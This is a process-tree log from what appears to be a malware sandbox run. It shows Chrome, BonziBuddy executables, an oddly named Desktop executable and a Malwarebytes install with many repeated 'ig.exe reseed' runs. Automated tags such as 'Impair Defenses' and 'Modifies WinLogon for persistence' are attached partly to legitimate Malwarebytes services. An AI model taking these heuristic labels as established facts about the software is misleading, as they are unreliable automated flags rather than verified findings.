"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4332 --field-trial-handle=1980,i,10797376030118130791,145891646793067415,131072 /prefetch:1
3⤵
PID:6932

C:\Program Files (x86)\BonziBuddy432\BonziBDY_35.EXE
"C:\Program Files (x86)\BonziBuddy432\BonziBDY_35.EXE"
2⤵
- Suspicious use of SetWindowsHookEx
PID:2924

C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE
"C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE"
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2444

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe shell32.dll,Control_RunDLL speech.cpl,,0
3⤵
PID:6224

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL speech.cpl,,0
4⤵
PID:1100

C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE
"C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE"
2⤵
- Suspicious use of SetWindowsHookEx
PID:4796

C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE
"C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE"
2⤵
- Suspicious use of SetWindowsHookEx
PID:6052

C:\Users\Admin\Desktop\@[email protected]
"C:\Users\Admin\Desktop\@[email protected]"
2⤵
- Suspicious use of SetWindowsHookEx
PID:212

C:\Windows\System32\WWAHost.exe
"C:\Windows\System32\WWAHost.exe"
2⤵
PID:5400

C:\Windows\bfsvc.exe
"C:\Windows\bfsvc.exe"
2⤵
PID:10260

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
2⤵
- Enumerates system info in registry
PID:10332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb7f38ab58,0x7ffb7f38ab68,0x7ffb7f38ab78
3⤵
PID:10348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 --field-trial-handle=1832,i,15711616338430457576,17671211571824375406,131072 /prefetch:2
3⤵
PID:10520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1832,i,15711616338430457576,17671211571824375406,131072 /prefetch:8
3⤵
PID:10540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2180 --field-trial-handle=1832,i,15711616338430457576,17671211571824375406,131072 /prefetch:8
3⤵
PID:10628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3032 --field-trial-handle=1832,i,15711616338430457576,17671211571824375406,131072 /prefetch:1
3⤵
PID:10768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3296 --field-trial-handle=1832,i,15711616338430457576,17671211571824375406,131072 /prefetch:1
3⤵
PID:10776

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4268 --field-trial-handle=1832,i,15711616338430457576,17671211571824375406,131072 /prefetch:1
3⤵
PID:11096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1600 --field-trial-handle=1832,i,15711616338430457576,17671211571824375406,131072 /prefetch:2
3⤵
PID:7236

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4764 --field-trial-handle=1832,i,15711616338430457576,17671211571824375406,131072 /prefetch:8
3⤵
PID:1616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4768 --field-trial-handle=1832,i,15711616338430457576,17671211571824375406,131072 /prefetch:8
3⤵
PID:2448

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4344

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5764

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2936 -ip 2936
1⤵
PID:1152

C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Enumerates connected drives
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies system certificate store
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868

C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe" /installmbtun
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
PID:6576

C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe" /Service /Protected
2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Modifies registry class
PID:3940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:1612

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "9" "C:\Program Files\Malwarebytes\Anti-Malware\mbtun\mbtun.inf" "9" "4ba9030c7" "0000000000000148" "Service-0x0-3e7$\Default" "0000000000000158" "208" "C:\Program Files\Malwarebytes\Anti-Malware\mbtun"
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:5028

C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"
1⤵
- Modifies WinLogon for persistence
- Drops file in Drivers directory
- Sets service image path in registry
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:988

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe" nowindow
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:6244

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:1652

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:2724

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:6232

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:6060

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:2972

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:4512

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:5572

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:4676

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:696

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:2980

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:1048

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:7012

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:5676

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:6988

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:6832

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:1496

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:3428

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:5308

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:3004

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:4872

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:2956

C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe
"C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe" "C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\config\UpdateControllerConfig.json" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\staging" /db:dbupdate /su:no
2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2256

C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe" /wac 0 /status on true /updatesubstatus none /scansubstatus none /settingssubstatus none
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6124

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:5480

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:5028

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:1612

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:4176

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:5896

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:5308

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:6576

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:3504

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:916

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:4212

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:3428

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:5852

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:5328

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:5636

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:5804

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
- Executes dropped EXE
PID:4384

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:2788

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:2316

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:3516

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:3964

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:7012

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6488

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:3432

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:3756

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:5760

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:2392

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:5656

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6808

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:5728

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6004

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:2216

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:3332

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:3744

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6844

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:1156

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:1604

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:396

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:2556

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6880

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:616

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:3800

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:5708

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6148

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:2148

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:2636

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6140

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:5644

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:4400

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:864

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:5568

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6480

C:\Users\Admin\AppData\LocalLow\IGDump\X86_02\ig.exe
ig.exe timer 4000 17207220992.ext
2⤵
PID:4880

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:2892

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:1828

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:5728

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:3100

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:1820

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:4328

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:232

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6124

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:5040

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:384

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:5724

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:5252

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6252

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:3316

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:2120

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:212

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:2788

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:4492

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6232

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:916

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:444

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:3692

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6560

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6552

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbupdatrV5.exe
"C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbupdatrV5.exe" "C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\config\UpdateControllerConfig.json" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\staging" /db:dbupdate /su:no
2⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2860

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6560

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:744

C:\Users\Admin\AppData\LocalLow\IGDump\X86_01\ig.exe
ig.exe timer 4000 17207222391.ext
2⤵
PID:3472

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:9104

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:9076

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8968

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8940

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8844

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8788

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:10216

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6012

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8612

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8596

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8584

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8576

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8552

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8536

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:4400

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:9340

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8492

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:1620

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8460

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8448

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:212

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8420

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8412

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:2788

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8384

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8372

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6888

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8352

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8340

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:2892

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8320

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:8296

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6188

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:4328

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:1180

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:3220

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:3548

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6728

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6768

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:6736

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:1548

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:7016

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:2264

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:1696

C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
2⤵
PID:7076

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x258 0x3dc
1⤵
PID:2400

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1084

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6024

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1832

